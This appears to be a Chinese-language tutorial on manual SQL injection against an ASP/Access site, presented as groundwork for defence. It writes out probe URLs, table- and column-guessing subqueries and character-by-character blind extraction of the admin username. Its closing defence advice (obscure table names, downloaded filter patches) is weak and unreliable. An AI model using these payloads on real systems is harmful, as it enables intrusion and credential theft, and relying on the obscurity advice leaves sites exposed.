很多情況下,入侵者在使用工具注入時發現工具才解不出來表名和字段名,那是因為所有的工具都有自己的一部字典,這部字典內包括了表名和字段名,如果管理員把表名和欄位名稱改成了不在這部字典內,那麼我們使用的工具就無法猜解出欄位名稱和表名。在以下的文章中,將從分析手工注入出發,來打造抵禦SQL注入的防線。
入侵者將會建構簡單的判斷條件,來判斷該頁面是否有註入漏洞,一般步驟如下:
這裡要偵測的頁面為http://127.0.0.1/111/view.asp?id=198
1.入侵者要對網站進行手工注入就必須對瀏覽器進行設置,以確保手工注入時能返回出錯信息,其操作步驟如下:
右鍵點擊瀏覽器選擇“屬性”,在彈出來的對話框中選擇“高級”選項卡。如下圖所示:
圖一
接著去掉「顯示友善的HTTP錯誤訊息」前面的鉤,最後點選「應用」按鈕即可。
2.入侵者向瀏覽器提交以下url:
http://127.0.0.1/111/view.asp?id=198 and 1=1
如果有SQL注入漏洞,就可以查詢資料庫,1=1是恆等式可以忽略,因此會返回一個正常的頁面,此頁面和http://127.0.0.1/111/view.asp?id=198一樣,這時入侵者便判斷此站有希望被注入。如果回傳的是一些錯誤訊息,那麼一些初級的入侵者可能就會放棄這個站點。
3.入侵者進一步向瀏覽器提交以下url:
http://127.0.0.1/111/view.asp?id=198 and 1=2
1=2為一個恆不等式,如果該站點支援資料庫查詢,則大概會返回如下圖所示的資訊:
圖二
一般出現上圖所示入侵者就基本確定此站能夠進行SQL注入攻擊了。
不過很多時候入侵者只要用一個單引號即可快速判斷出目標網站是否有SQL注入漏洞,向瀏覽器提交如下url:
http://127.0.0.1/111/view.asp?id=198'如果傳回下列資訊則說明有一半機會以上有註入漏洞:
Microsoft OLE DB Provider for ODBC Drivers 錯誤'80040e14'
[Microsoft] [ODBC Microsoft Access Driver]字串的語法錯誤在查詢運算式'id =1''。 /list.asp,行50
4.此時入侵者開始建構特殊的SQL查詢語句開始查詢網站資料庫的表名,向url提交如下語句:
http://127.0.0.1/111/view.asp?id= 198 and exists(select * from admin)
這個語句是向資料庫查詢是否存在admin這個表,如果存在則傳回正常頁面,如果不存在此表則傳回出錯頁面。一般入侵者會先測試常用的表名,也是一般的注入工具密碼字典內存在的表名和欄位名。如果表名不在常用表名中則入侵者就會結合社會工程學來猜解表名,這種情況下入侵者猜中表名的幾率較低。
5.入侵者在得到表名後開始建構查詢語句查詢資料庫欄位名,向url提交如下語句:
http://127.0.0.1/111/view.asp?id=198 and exists(select user from admin)
這個語句是向資料庫中admin表中查詢是否有user字段,如果存在則傳回正常頁面,如果不存在則傳回出錯頁面。
7.接下來入侵者開始確定字段id的值,建構如下語句可以查詢id的值:http://127.0.0.1/111/view.asp?id=198 and exists (select id from admin where id=1 )
正確則傳回正確頁面,錯誤則傳回出錯頁面。
6.表名和欄位名稱猜測出來以後,入侵者開始建構查詢語句猜測管理員帳號長度,向url提交如下語句:
http://127.0.0.1/111/view.asp?id=198 and exists(select id from admin where len(user)<6 and id=1)
此語句為查詢user欄位中使用者名稱長度範圍,表示長度小於6,正確則傳回正常頁面,錯誤則傳回出錯頁面。
縮小範圍,然後建構如下語句確定使用者名稱具體長度:
http://127.0.0.1/111/view.asp?id=198 and exists(select id from admin where len(user)=5 and id=1)
正確則返回正常頁面,錯誤則返回出錯頁面。
8.接下來入侵者開始進入最後的環節建構語句查詢管理員用戶名,向url提交如下語句:http://127.0.0.1/111/view.asp?id=198 and exists(select count(*) from admin where left(user,1)='a')
此語句是從用戶名左邊開始猜測用戶名地一位為a,正確則返回正常頁面,錯誤則返回出錯頁面,一位一位猜,猜第2位時,修改語句為(user,2)='ad',後面類推。
在入侵者得到使用者名稱密碼以後,此次注入就接近尾聲了。
至於防範方法很簡單,從上面的過程可以看出如果表名和字段名不在常用表名和字段名中則入侵者是使用社會工程學來猜解,如果管理員修改的表名和字段名足夠複雜則入侵者依然無法達到目的,還有一種簡單的防禦方法就是到網上去下載一些防注入補丁程序打上就可以了,這種方法是修改站點文件,增加過濾語句來過濾入侵者提交的語句來達到防注入的,這裡就不再跟大家講解其原理了。